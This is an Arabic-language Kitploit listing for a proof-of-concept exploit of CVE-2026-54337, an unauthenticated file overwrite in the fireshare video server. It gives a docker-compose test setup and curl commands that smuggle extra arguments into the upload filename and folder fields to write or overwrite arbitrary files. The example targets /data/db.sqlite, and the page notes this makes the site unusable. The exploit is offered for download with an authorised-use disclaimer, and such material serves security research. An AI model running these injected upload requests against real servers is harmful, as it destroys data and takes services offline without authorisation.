Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-54337-PoC — CVE-2026-54337 - إثبات المفهوم لكتابة/الكتابة فوق الملفات بدون مصادقة لـ fireshare <= 1.16.3 | Kitploit
أدوات/GitHubGitHub/4qu4r1um/cve-2026-54337-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليم
GitHub4qu4r1um/cve-2026-54337-poc

CVE-2026-54337-PoC

CVE-2026-54337 - إثبات المفهوم لكتابة/الكتابة فوق الملفات بدون مصادقة لـ fireshare <= 1.16.3

عرض المستودع
منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-54337 إثبات المفهوم

CVE-2026-54337 - كتابة/استبدال ملف بدون مصادقة في fireshare <= 1.16.3 إثبات المفهوم

لمزيد من المعلومات، يرجى الرجوع إلى هذا التنبيه على GitHub

الإعداد

  • يُرجى استخدام ملف docker-compose.yml التالي للاختبار
root@kitploit:~
services:
  fireshare:
    container_name: fireshare-temp
    image: shaneisrael/fireshare:1.6.13-lite

    ports:
      - "8082:80"

    # Ephemeral storage (discarded when container stops)
    tmpfs:
      - /data
      - /processed
      - /videos
      - /images

    environment:
      - ADMIN_USERNAME=admin
      - ADMIN_PASSWORD=admin123
      - SECRET_KEY=fireshare-super-secret-random-key
      - DOMAIN=
      - PUID=1000
      - PGID=1000

    restart: unless-stopped

الاستغلال

  • الخطوة 1: أنشئ أي ملف طالما قمت بتسميته بامتداد .mp4، على سبيل المثال
root@kitploit:~
$ echo 123 > test.mp4
  • الخطوة 2: شغّل أمر curl التالي (تأكد من تغيير العناصر النائبة)
root@kitploit:~
$ curl -s -w "HTTP %{http_code}\n" \
  -F "file=@<FILEPATH>;filename=<FILE TO OVERWRITE/WRITE> -select_streams v.mp4" \
  -F "folder=testfolder -o <DIRECTORY TO PUT THE FILE>" \
  http://<URL>/api/upload/public

على سبيل المثال، لاستبدال /data/db.sqlite، قم بتغيير الأمر إلى ما يلي

root@kitploit:~
$ curl -s -w "HTTP %{http_code}\n" \
  -F "file=@<FILEPATH>;filename=db.sqlite -select_streams v.mp4" \
  -F "folder=testfolder -o data" \
  http://<URL>/api/upload/public

ملاحظة

  • نظرًا لأن الخدمة تعمل افتراضيًا تحت مستخدم nginx، الذي لديه حق الوصول فقط إلى /data و/processed و/images و/videos، لذا يمكنك فقط الكتابة/الاستبدال هناك
  • ولهذا السبب، في رأيي، استبدال /data/db.sqlite له التأثير الأعلى لأنه سيجعل الموقع غير قابل للاستخدام

إخلاء المسؤولية

  • يتم تقديم إثبات المفهوم (PoC) هذا لأغراض تعليمية وبحثية وأمنية دفاعية فقط.
  • المؤلف غير مسؤول عن أي سوء استخدام أو ضرر أو وصول غير مصرح به أو تعطيل الخدمة أو فقدان البيانات أو عواقب قانونية ناتجة عن استخدام هذا الكود. المستخدمون مسؤولون وحدهم عن ضمان الامتثال لجميع القوانين واللوائح ومتطلبات التفويض المعمول بها قبل استخدام إثبات المفهوم هذا.
  • يجب تنفيذ إثبات المفهوم هذا فقط ضد الأنظمة التي لديك إذن صريح لاختبارها. قد يكون الاختبار غير المصرح به للأنظمة غير قانوني وغير أخلاقي.
  • باستخدام هذا البرنامج، فإنك تقر بأنك تفعل ذلك على مسؤوليتك الخاصة.
تنزيل الأداة